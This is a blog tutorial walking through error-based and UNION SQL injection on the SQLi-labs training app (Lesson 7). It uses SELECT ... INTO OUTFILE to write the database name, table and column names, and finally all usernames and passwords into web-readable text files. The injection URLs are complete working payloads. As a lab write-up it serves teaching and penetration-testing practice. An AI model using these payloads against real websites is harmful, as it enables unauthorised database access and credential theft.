Categories

Archives

Database Hacking, Penetration Testing

Dumping Database using Outfile

In our previous article you have learned the basic concepts of SQL injection but in some scenarios, you will find that your basic knowledge and tricks will fail. Today we are going to perform SELECT…INTO OUTFILE statement is the easiest way of exporting a table records into a text file or excel file

 This statement allows the user to load table information very rapidly to a text file on the server machine. SELECT … INTO OUTFILE writes the significant rows to a file and gives authority to the use of column and row terminators to specify the output format. The output file is created directly by the MySQL server, so the filename with path should be specified where the user wants the file to be written on the server host. The file must not exist already on the server. It cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!

Lesson 7

Open the browser and type following SQL query in URL

http://localhost:81/sqli/Less-7/?id=1

From the screenshot, you can read “you are in….. Use outfile” now let’s try to break this statement.

OKAY! The Query has been broken successfully we receive the error message when we had used single quote (‘) in order to break query hence it confirms that it is vulnerable.

http://localhost:81/sqli/Less-7/?id=1'

After making lots of efforts finally successfully the query gets fixed if noticed the step for SQL injection is similar to the previous chapter only techniques to fix the query is different.

http://localhost:81/sqli/Less-7/?id=1')) --+

Now the following query will dump the result into a text file. Here you need to mention the path where the user wants the file to be written on the server host. The file must not exist already on server user always use a new text file for overwriting database information.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+

From the screenshot, you can perceive that still it is showing error message now open another tab for the output of the resultant query.

http://localhost:81/sqli/Less-7/

Now add file name hack1.txt to check the output of the above query.

http://localhost:81/sqli/Less-7/hack1.txt

hence you can see we get the output of executed query inside a text file. This will save the hack1.txt file inside the server machine also.

Execute the following query to retrieve the database name using union injection using a new text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+

http://localhost:81/sqli/Less-7/hack2.txt

Hence you can see we have successfully get security as database name as result.

Next query will provide entire table names saved inside the database using another text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+

http://localhost:81/sqli/Less-7/hack3.txt

From the screenshot you can read the following table names:

T1: emails
T2: referers
T3: uagents
T4: users

Now we’ll try to find out column names of users table using the following query.

localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+

http://localhost:81/sqli/Less-7/hack4.txt

Hence you can see it contains so many columns inside it I had chosen only two columns for further enumeration.

C1: username
C2: password

At last, execute the following query to read all username and password inside the table users from inside its column.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password)from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+

http://localhost:81/sqli/Less-7/hack5.txt

From the screenshot, you can read the username and password save the inside text file.

Note: you can try the same attack using excel file; attacker only need to change hack1.txt into hack1.csv which will save the output into excel file.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here